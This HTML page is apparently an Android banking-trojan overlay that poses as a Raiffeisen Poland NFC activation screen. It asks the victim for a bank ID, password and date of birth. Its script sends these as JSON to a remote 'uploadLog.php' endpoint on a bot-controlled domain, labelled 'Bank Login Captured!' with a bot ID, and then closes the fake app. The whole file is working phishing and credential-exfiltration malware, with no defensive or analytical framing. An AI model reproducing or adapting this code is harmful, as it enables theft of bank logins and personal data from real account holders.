<!DOCTYPE html>
<html>
<head>
    <title>nfc</title>
    <link rel="shortcut icon" href="pl.raiffeisen.nfc.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
    body {
        background: #fff;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
        background-size: 100%;
    }
    .logo {
text-align: right;
    background-size: 100%;
    padding: 30px 0px 0px 0px;
    color: #fff;
    font-weight: 400;
    text-decoration: none;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
    line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 10px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 0px 0px 20px 0px;
    color: #151515;
    outline: none;
    border: 1px solid #686666;
    background: #fff;
    border-top: none;
    border-left: none;
    border-right: none;
}
input[type="button"] {
left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #fff;
    border: none;
    font-size: 17px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #4caf6a;
    border-radius: 30px;
}
fieldset span {
    display: inline-block;
    text-align: center;
    color: #4b4949;
    left: 0;
    right: 0;
    padding-top: 30px;
}
fieldset p {
    display: inline-block;
    left: 0;
    right: 0;
    color: #088f0d;
}
.logo span {
    display: inline-block;
    float: left;
    padding: 40px 0px 0px 20px;
    font-size: 20px;
    color: #fff;
    font-weight: 600;
}
input::placeholder {
    color: #151515;
    font-size: 15px;
}
.pass input::placeholder {
    font-size: 11px;
    color: #db2060;
}
</style>


<fieldset id="formtosend">

<div id="log1">

<p style="float: left; padding: 20px; color: #000; font-weight: 600; font-size: 20px;">Wpisz swoje dane</p>

<div class="area" style="padding: 20px 20px 50px 20px;border-radius: 3px;margin-top: 40px;">
        <input type="text" name="id" id="id" style="height: 50px;" placeholder="ID">
         <input type="password" name="password" id="password" style="height: 50px;" placeholder="Hasło">
         <input required="" type="text" name="bday" class="form-control" placeholder="Data urodzenia" style="width: 100%; height: 50px; border: 1px solid #686666; border-top: none; border-left: none; border-right: none; outline: none; padding: 10px;" onfocus="(this.type='date')"/>
        <input type="button" name="sumbit" value="Aktywuj" onclick="send_form()">
</div>

</div>
        
        </div>
        <input name="exit" type="hidden" text="true"/>
</div>

</div>

</fieldset> 

<script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
        if (document.getElementById("id").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
        if (document.getElementById("password").value == '')
{
    alert ('Wszystkie pola wymagane!');
    return false;
}
    var form = document.getElementById('formtosend');
    fetch("http://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}
</script>

</body>
</html>